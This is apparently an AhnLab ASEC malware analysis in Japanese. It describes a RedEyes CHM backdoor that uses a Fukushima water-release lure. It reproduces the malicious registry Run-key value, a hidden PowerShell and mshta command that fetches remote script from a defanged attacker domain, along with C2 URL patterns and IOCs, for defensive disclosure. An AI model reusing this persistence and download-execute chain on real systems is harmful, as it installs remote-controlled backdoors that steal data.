福島の汚染水放出に関する内容を利用した CHM マルウェア：RedEyes(ScarCruft)

ASEC(AhnLab Security Emergency response Center)分析チームは、RedEyes 攻撃グループが作成したものと推定される CHM マルウェアが、最近再び拡散している状況を捕捉した。最近拡散している CHM マルウェアは、今年3月に紹介した「韓国国内の金融企業セキュリティメールを詐称した CHM マルウェア」[1]と類似した方式によって動作し、今回も RedEyes グループの M2RAT マルウェア攻撃プロセスのうち「2.3.持続性の維持 (Persistence)」[2]において使われたコマンドが同様に確認された。

今回の攻撃には福島第一原発の汚染水放出に関する内容を利用しているが、攻撃者は韓国国内で争点となっているトピックを利用してユーザーの好奇心を誘発し、不正なファイルを開かせるように誘導している。当該内容は[図1]のように、CHM マルウェア実行時に生成されるヘルプウィンドウで確認できる。

この過程で実行される不正なスクリプトは[図2]の通りである。かつては mshta コマンドを CHM ファイル(hh.exe)で直ちに実行する方式であったが、最近拡散しているファイルでは RUN キーに当該コマンドを登録してシステム再起動時に実行するよう変更されている。

• RUN キー登録
  レジストリのパス： HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  値の名称：fGZtm
  値：c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html

RUN キーに登録されたコマンドが動作すると、mshta によって特定の URL に存在する追加スクリプトが実行される。この URL には JS(JavaScript)コードが含まれており、このコードはエンコードされた PowerShell コマンドを実行する機能を担っている。このプロセスは過去に紹介した CHM マルウェア、および M2RAT マルウェアの攻撃プロセスで使用されたコマンドと類似した形態である。

デコードされた PowerShell コマンドは、持続性のために RUN キーの登録、攻撃者サーバーからのコマンドの受信、コマンド実行結果の伝達の機能を実行するバックドアタイプである。攻撃者のサーバーからコマンドを受信し、コマンドによってファイルのアップロードおよびダウンロード、特定ファイルの情報転送、レジストリ編集など、様々な不正な振る舞いを実行することがある。

• C2
  hxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[コンピュータ名]-[ユーザー名] // 攻撃者コマンドの受信 hxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[BASE64 エンコード] // コマンド実行結果の伝達

このタイプのマルウェアに感染すると、攻撃者のコマンドに応じてさらなるファイルのダウンロードおよび情報窃取などの様々な不正な振る舞いが実行され、大きな被害を受けることがある。特に、韓国国内のユーザーを対象に拡散しているマルウェアは、配布対象によって関心のあるトピックの内容を含んでユーザーの実行を誘導するため、出どころの分からないメールの閲覧は避け、添付ファイルの実行を控える必要がある。また、周期的に PC のメンテナンスを行い、セキュリティ製品を最新エンジンにアップデートしなければならない。

[ファイル検知]
Downloader/CHM.Generic (2023.09.02.00)

[IOC]
52f71fadf0ea5ffacd753e83a3d0af1a
hxxp://navercorp[.]ru/dashboard/image/202302/4.html
hxxp://navercorp[.]ru/dashboard/image/202302/com.php

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認することができる。